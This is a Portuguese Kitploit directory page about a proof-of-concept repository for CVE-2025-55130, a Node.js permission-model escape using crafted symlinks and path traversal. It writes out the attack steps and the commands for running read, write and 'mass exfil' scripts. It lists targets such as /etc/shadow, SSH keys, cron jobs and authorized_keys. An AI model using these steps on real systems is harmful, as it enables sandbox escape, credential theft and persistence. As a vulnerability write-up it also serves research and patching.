Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/scumfrog/cve-2025-55130
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoExfiltração de DadosSegurança WebEscape de Contêiner
GitHubscumfrog/cve-2025-55130

CVE-2025-55130

POC para CVE-2025-55130

Ver Repositório
1há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-55130 - Escape do Modelo de Permissão do Node.js via Symlink

root@kitploit:~
   ___ _   _ ___     ____   ___ ____  ____      ____ ____ _ _____ ___  
  / __| | | | __|___/ _  \ / _ \___ \| ___|    | ___| ___/ |___ // _ \ 
 | (__| |_| | _|___| |_| || | | |__) |___ \ _____|__ \___ \ | |_ | | | |
  \___|\___/|___|   \__  ||_| |_|___/|_____|_____|__) |__) || |__) |_| |
                    |___/                       |____/____/|_|____/\___/ 
                                                                        
        Node.js Permission Model Bypass via Crafted Symlinks
                   [ Discovered by natann @ JFrog ]

Visão Geral

Uma falha de path traversal no Node.js permite escapar das restrições de permissão --allow-fs-read e --allow-fs-write usando symlinks que apontam para caminhos absolutos combinados com travessia relativa.

A verificação de permissão e a resolução de caminho acontecem separadamente. Depois que o caminho inicial passa pela verificação de permissão, o symlink é seguido e as sequências de travessia escapam do sandbox.

Versões Afetadas

Branch

Análise Técnica

Causa Raiz

root@kitploit:~
Permission Check:  ./nested/dirs/symlink/../../../etc/passwd
                   ^^^^^^^^^^^^^^^^^^ ALLOWED (starts with ./)
                   
Path Resolution:   /actual/path/to/script/../../../etc/passwd
                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ 
                   Resolves to /etc/passwd - OUTSIDE SANDBOX

O modelo de permissão valida a string do caminho antes da resolução do symlink. Ao criar um symlink para um caminho absoluto e usar a travessia ../ DEPOIS do symlink, escapamos do diretório permitido.

Fluxo de Ataque

root@kitploit:~
1. mkdir -p ./a/b/c/d/e/f/g           # Create nested dirs in allowed path
2. ln -s $(pwd) ./a/b/c/d/e/f/g/x     # Symlink to absolute path  
3. read ./a/b/c/d/e/f/g/x/../../../etc/passwd
         ^^^^^^^^^^^^^^^^^ 
         Permission check passes (inside ./)
         
   After symlink resolution:
   /home/user/project/../../../etc/passwd -> /etc/passwd
   ^^^^^^^^^^^^^^^^^^^^
   Traversal escapes to root

Arquivos

ArquivoFinalidade
exploit.jsExploit principal - lê arquivos arbitrários
exploit_write.jsEscreve arquivos arbitrários

Uso

root@kitploit:~
# Basic exploitation
node --permission --allow-fs-read=. --allow-fs-write=. exploit.js

# Check if vulnerable
node check.js

# Mass exfil
node --permission --allow-fs-read=. --allow-fs-write=. exfil.js

Impacto

  • Ler arquivos sensíveis: /etc/passwd, /etc/shadow, chaves SSH, configurações
  • Escrever arquivos arbitrários: cron jobs, authorized_keys, configurações
  • Escape de container em ambientes multi-tenant
  • Bypass de sandbox para execução de código não confiável

Referências

  • https://research.jfrog.com/vulnerabilities/nodejs-fs-permissions-bypass-cve-2025-55130/
  • https://nodejs.org/en/blog/vulnerability/december-2025-security-releases
  • https://nvd.nist.gov/vuln/detail/CVE-2025-55130

Créditos

  • Vulnerabilidade: Natan Nehorai (natann) @ JFrog Security Research
  • Correção: RafaelGSS @ Node.js

Apenas para pesquisa e testes autorizados.

Baixar ferramenta
Vulnerável
Corrigida
20.x< 20.20.020.20.0
22.x< 22.22.022.22.0
24.x< 24.13.024.13.0
25.x< 25.3.025.3.0
exfil.jsExfiltração em massa de arquivos
check.jsVerificação de vulnerabilidade da versão